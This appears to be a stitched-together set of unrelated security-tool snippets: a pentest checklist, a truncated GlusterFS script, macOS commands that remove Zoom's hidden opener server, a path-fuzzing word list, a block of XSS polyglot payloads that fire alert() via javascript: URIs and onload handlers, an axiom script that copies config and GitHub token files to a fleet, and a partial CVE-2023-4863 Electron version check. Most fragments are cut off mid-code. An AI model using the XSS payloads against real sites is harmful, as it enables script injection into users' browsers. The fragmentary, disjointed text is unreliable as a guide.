- Recon
- Find vuln
- Exploit
- Document it
Run unicornscan from the CLI, and nmap from inside msfconsole to help store loot in the database.
```bash
#!/bin/bash
# Require two or three arguments; otherwise print the usage text.
if [[ "$#" -lt 2 || "$#" -gt 3 ]]; then
cat <<END
Glusterfs GFID resolver -- turns a GFID into a real file path
Usage: $0 <brick-path> <gfid> [-q]
<brick-path> : the path to your glusterfs brick (required)
```
If you're using macOS, run these commands:

```bash
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;
```

These two commands do the same thing for the two most popular "brands" of Zoom (Zoom and RingCentral). They first kill the hidden server if it is running, and then, whether or not it was running, delete it from its hidden directory if it exists there. Finally they create an empty file
```python
# coding=utf-8
# python3
from urllib.parse import urlparse
import requests
import urllib3
from bs4 import BeautifulSoup
```
```text
.
..
........
@
*
*.*
*.*.*
🎠
```
```text
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript><
```
```bash
#!/bin/bash
# Use this as the initial axiom script in the reconftw.cfg file to copy config files to the fleet
axiom-exec 'mkdir -p /home/op/.config/amass/ /home/op/Tools/ /home/op/.config/subfinder/ /home/op/.config/notify/'
axiom-scp ~/.config/amass/config.ini '*':/home/op/.config/amass/config.ini
axiom-scp ~/Tools/h8mail_config.ini '*':/home/op/Tools/h8mail_config.ini
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens
axiom-scp ~/.config/notify/notify.conf '*':/home/op/.config/notify/notify.conf
```
Here's how this attack works: https://www.google.com/amp/s/www.zdnet.com/google-amp/article/how-i-survived-a-sim-swap-attack-and-how-my-carrier-failed-me/
```zsh
#!/usr/bin/env zsh
# patched versions for CVE-2023-4863: 22.3.24, 24.8.3, 25.8.1, 26.2.1
mdfind "kind:app" 2>/dev/null | sort -u | while read app;
do
filename="$app/Contents/Frameworks/Electron Framework.framework/Electron Framework"
if [[ -f $filename ]]; then
echo "App Name: $(basename ${app})"
electronVersion=$(strings "$filename" | grep "Chrome/" | grep -i Electron | grep -v '%s' | sort -u | cut -f 3 -d '/')
```